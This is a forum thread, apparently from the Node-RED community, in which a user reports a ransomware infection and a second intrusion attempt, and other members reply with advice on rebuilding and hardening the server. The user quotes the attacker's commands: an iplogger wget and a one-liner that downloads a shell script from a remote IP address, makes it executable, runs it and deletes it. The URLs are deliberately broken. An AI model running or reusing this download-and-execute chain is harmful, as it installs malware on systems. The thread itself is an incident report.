Security breach, malware alert

Hi,
My first server was hacked. All my files were encrypted using twi extension. The email address for communication purposes was twinkkast@xmpp.jp.
Moving on, I installed another node-red instance on a new server and saw a second attempt to hack my program. I have attached some print screens.
Some commands include:
"wget https ://iplogger.com/2KEWp4"

cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd ~ || cd /; cd /tmp; wget HTTP ://91.92.249.32/bins/bins.sh -O bins.sh || curl -O http ://91.92.249.32/bins/bins.sh; chmod +x ./bins.sh || chmod 777 ./bins.sh; /bin/bash ./bins.sh; rm -f ./bins.sh


Edited to break the URL's for safety

2 Likes

It is recommended that you rebuild your server at this point. It is hard if not impossible to be certain that nothing else has been compromised.

Since this is the 2nd attempt, you should be extra cautious about restoring from OS-level backups. If it were me, I wouldn't. Rather I would re-install and only restore known good data.

You should also check any other devices on your network for signs of tampering or odd services/applications running. And change ALL local passwords.

You should then ensure that your server does not allow direct access from the Internet. Instead, use of a 3rd-party security service such as Cloudflare Zero Trust is recommended.

If you really must allow direct access, it is strongly recommended that you read the security FAQ's in this forum and ensure that you have several layers of security.

You should also note that there are various variants of Linux malware around, including some newly reported ones. Typically they target weak passwords on common services such as Telnet (hint: just never use that anywhere) and SSH. We believe it possible that weak passwords on the Node-RED Editor may also have been targeted.

Sadly you are not the first to be hacked though I don't think anyone else has reported the attackers successfully encrypted files.

I'm afraid you should view all of the devices on your network as suspect, including your router, regardless of operating system.

Your first step should be to disconnect the router. Probably do a factory reset and never, never open a port from the internet into your local network.

1 Like

Thank you for your recommendations!

Thank you!